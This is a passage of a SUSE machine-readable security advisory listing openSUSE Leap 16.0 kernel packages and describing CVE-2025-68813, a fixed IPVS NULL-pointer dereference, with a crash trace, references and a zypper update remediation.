"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-68811"
},
{
"cve": "CVE-2025-68813",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68813"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipvs: fix ipv4 null-ptr-deref in route error path\n\nThe IPv4 code path in __ip_vs_get_out_rt() calls dst_link_failure()\nwithout ensuring skb-\u003edev is set, leading to a NULL pointer dereference\nin fib_compute_spec_dst() when ipv4_link_failure() attempts to send\nICMP destination unreachable messages.\n\nThe issue emerged after commit ed0de45a1008 (\"ipv4: recompile ip options\nin ipv4_link_failure\") started calling __ip_options_compile() from\nipv4_link_failure(). This code path eventually calls fib_compute_spec_dst()\nwhich dereferences skb-\u003edev. An attempt was made to fix the NULL skb-\u003edev\ndereference in commit 0113d9c9d1cc (\"ipv4: fix null-deref in\nipv4_link_failure\"), but it only addressed the immediate dev_net(skb-\u003edev)\ndereference by using a fallback device. The fix was incomplete because\nfib_compute_spec_dst() later in the call chain still accesses skb-\u003edev\ndirectly, which remains NULL when IPVS calls dst_link_failure().\n\nThe crash occurs when:\n1. IPVS processes a packet in NAT mode with a misconfigured destination\n2. Route lookup fails in __ip_vs_get_out_rt() before establishing a route\n3. The error path calls dst_link_failure(skb) with skb-\u003edev == NULL\n4. ipv4_link_failure() -\u003e ipv4_send_dest_unreach() -\u003e\n __ip_options_compile() -\u003e fib_compute_spec_dst()\n5. fib_compute_spec_dst() dereferences NULL skb-\u003edev\n\nApply the same fix used for IPv6 in commit 326bf17ea5d4 (\"ipvs: fix\nipv6 route unreach panic\"): set skb-\u003edev from skb_dst(skb)-\u003edev before\ncalling dst_link_failure().\n\nKASAN: null-ptr-deref in range [0x0000000000000328-0x000000000000032f]\nCPU: 1 PID: 12732 Comm: syz.1.3469 Not tainted 6.6.114 #2\nRIP: 0010:__in_dev_get_rcu include/linux/inetdevice.h:233\nRIP: 0010:fib_compute_spec_dst+0x17a/0x9f0 net/ipv4/fib_frontend.c:285\nCall Trace:\n \u003cTASK\u003e\n spec_dst_fill net/ipv4/ip_options.c:232\n spec_dst_fill net/ipv4/ip_options.c:229\n __ip_options_compile+0x13a1/0x17d0 net/ipv4/ip_options.c:330\n ipv4_send_dest_unreach net/ipv4/route.c:1252\n ipv4_link_failure+0x702/0xb80 net/ipv4/route.c:1265\n dst_link_failure include/net/dst.h:437\n __ip_vs_get_out_rt+0x15fd/0x19e0 net/netfilter/ipvs/ip_vs_xmit.c:412\n ip_vs_nat_xmit+0x1d8/0xc80 net/netfilter/ipvs/ip_vs_xmit.c:764",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68813",
"url": "https://www.suse.com/security/cve/CVE-2025-68813"
},
{
"category": "external",
"summary": "SUSE Bug 1256641 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256641"
},
{
"category": "external",
"summary": "SUSE Bug 1256644 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256644"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
